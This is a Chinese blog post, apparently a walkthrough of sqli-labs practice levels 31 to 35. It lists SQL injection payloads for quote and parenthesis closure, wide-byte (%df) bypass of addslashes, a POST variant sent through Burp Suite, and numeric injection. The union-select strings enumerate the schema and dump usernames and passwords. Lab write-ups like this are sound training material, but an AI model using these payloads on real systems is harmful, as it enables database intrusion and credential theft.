第31关( ") 闭合)
查数据库
?id=") union select 1,2,database() --+
查表
?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
查列
?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
查数据
?id= ") union select 1,2,group_concat(username,0x7e,password) from users --+
第32关(宽字节注入)
查数据库
?id=-1%df%27%20union%20select%201,database(),3%20--+
查表
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
查列
?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+
查数据
?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
第33关(宽字节注入)
查数据库
?id=-1%df%27%20union%20select%201,database(),3%20--+
查表
?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
查列
?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273--+
查数据
?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
第34关( post 宽字节)
本关使用addslashes函数对于账户和密码都进行转义
使用Burpsuite抓包,在登录的时候抓,然后发送到repeater
查数据库
%df' union select 1,database()#
查表
%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
查列
%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
查数据
%df%27 union select 1,group_concat(password,username) from users#
第35关(数字闭合直接注入)
查数据库
?id=-1 union select 1,2,database()#
查表
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()#
查列
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273#
查数据
?id=-1 union select 1,2,group_concat(username,password)from users #
标签:group,name,31,35,labs,table,id,concat,schema
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141569073